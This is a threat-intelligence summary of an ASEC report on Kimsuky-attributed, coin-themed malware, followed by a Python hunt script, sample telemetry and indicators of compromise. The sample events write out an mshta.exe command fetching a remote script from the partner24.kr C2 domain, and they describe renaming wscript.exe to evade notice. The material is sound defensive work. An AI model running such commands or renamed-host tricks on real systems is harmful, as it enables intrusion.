Distribution of Malware Disguised as Coin and Investment-related Content

2023-08-09 Ahnlab

https://asec.ahnlab.com/en/55944/


ASEC reports malware themed around coin exchanges and investment, distributed both as self-extracting (SFX) executables carrying Word or PDF icons and as a macro-enabled Word document. The SFX samples open a decoy document while launching mshta.exe to run a script fetched from a partner24.kr path. The Word variant copies wscript.exe to word.exe, downloads a Base64-encoded script from the same infrastructure, saves it as set.sl, and runs it through the renamed script host. ASEC attributes the activity to Kimsuky with low confidence, based on the misspelled "Chnome" User-Agent string used by the macro and on the coin-themed file names and C2 infrastructure shared across the samples. The script served by the C2 was no longer available at analysis time, so the final payload is unknown; a chain of this kind can deliver credential theft, download further malware, or carry out other operator-directed actions.
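
Hunt logic for the behaviours described above, added here as an example; it is not code from the ASEC report. It runs over constructed Sysmon-style process events and proxy log lines. The only value taken from the report is the partner24.kr domain; the file paths, URL path, timestamps, client addresses and User-Agent strings in the sample data are hypothetical. It also generalises beyond the report by flagging any script host running under a renamed image, not only wscript.exe copied to word.exe.

```python
import re
from urllib.parse import urlparse

# Domain from the report's IOC list; every other value in this file is constructed.
IOC_DOMAINS = {"partner24.kr"}

# Script hosts worth catching under a renamed image. The report describes
# wscript.exe copied as word.exe; the other entries are a generalisation.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def host_in_iocs(url: str) -> bool:
    """True when the URL's host is an IOC domain or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS)


def check_process(ev: dict) -> list:
    """Rules that fire on one Sysmon EID 1 style event.

    Keys: image, cmdline, original_file_name (Sysmon's OriginalFileName, read
    from the PE version resource, which survives a plain file copy or rename).
    """
    hits = []
    image = basename(ev.get("image", ""))
    cmdline = ev.get("cmdline", "")
    orig = ev.get("original_file_name", "").lower()

    # mshta.exe handed a URL: remote script execution, as in the SFX samples.
    if image == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_script")

    # A script host running under another file name (wscript.exe -> word.exe).
    if orig in SCRIPT_HOSTS and image != orig:
        hits.append("renamed_script_host")

    # Any URL on the command line that points at a known C2 domain.
    if any(host_in_iocs(u) for u in URL_RE.findall(cmdline)):
        hits.append("ioc_domain")
    return hits


def check_proxy_line(line: str) -> list:
    """Rules on one constructed proxy line: <ts> <client> <method> <url> "<ua>"."""
    m = re.match(r'(\S+) (\S+) (\S+) (\S+) "([^"]*)"$', line)
    if not m:
        return []
    url, ua = m.group(4), m.group(5)
    hits = []
    # The macro's misspelled "Chnome" User-Agent; no real browser sends it.
    if "chnome" in ua.lower():
        hits.append("chnome_user_agent")
    if host_in_iocs(url):
        hits.append("ioc_domain")
    return hits


# Constructed sample telemetry (hypothetical paths and URL path, not from the report).
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "original_file_name": "MSHTA.EXE",
     "cmdline": "mshta.exe https://partner24.kr/hypothetical/path"},
    {"image": r"C:\Users\Public\word.exe", "original_file_name": "wscript.exe",
     "cmdline": r"C:\Users\Public\word.exe C:\Users\Public\set.sl"},
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "original_file_name": "WinWord.exe", "cmdline": "WINWORD.EXE /n"},
    {"image": r"C:\Windows\System32\mshta.exe", "original_file_name": "MSHTA.EXE",
     "cmdline": r"mshta.exe C:\Temp\local.hta"},
]
PROXY_LOG = [
    '2023-07-31T09:12:03Z 10.0.0.7 GET https://partner24.kr/hypothetical/path "Mozilla/5.0 (Windows NT 10.0) Chnome"',
    '2023-07-31T09:12:05Z 10.0.0.7 GET https://www.example.com/ "Mozilla/5.0 (Windows NT 10.0) Chrome/115.0"',
]


def hunt() -> list:
    """Return (source, hits) for every sample record that fires at least one rule."""
    findings = []
    for i, ev in enumerate(PROCESS_EVENTS):
        hits = check_process(ev)
        if hits:
            findings.append(("process[%d]" % i, hits))
    for i, line in enumerate(PROXY_LOG):
        hits = check_proxy_line(line)
        if hits:
            findings.append(("proxy[%d]" % i, hits))
    return findings


if __name__ == "__main__":
    for source, hits in hunt():
        print(source, ", ".join(hits))
```

The renamed-host rule depends on OriginalFileName rather than the on-disk name, which is why a copy of wscript.exe saved as word.exe still matches; the benign WINWORD.EXE and local-HTA events in the sample data show the rules staying quiet on ordinary Office and mshta activity.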

Indicators of Compromise

Type        Value                             First Seen  Last Seen
HASH (MD5)  b6614471ebf288689d33808c376540e1  2023-07-31  2023-08-09
HASH (MD5)  8a5fd1e9c9841ff0253b2a6f1e533d0e  2023-07-31  2023-08-09
HASH (MD5)  17daf3ea7b80ee95792d4b3332a3390d  2023-07-31  2023-08-09
HASH (MD5)  002105e21f1bddf68e59743c440e416a  2023-07-31  2023-08-09
URL         https://partner24.kr/mokozy/hop…  2023-07-31  2023-08-09
URL         https://partner24.kr/mokozy/hop…  2023-07-31  2023-08-09
URL         https://partner24.kr/mokozy/hop…  2023-07-31  2023-08-09
URL         https://partner24.kr/mokozy/hop…  2023-07-31  2023-08-09

The four URL entries are distinct paths under partner24.kr/mokozy/ that are truncated on the source page; the full values are in the ASEC report linked above.
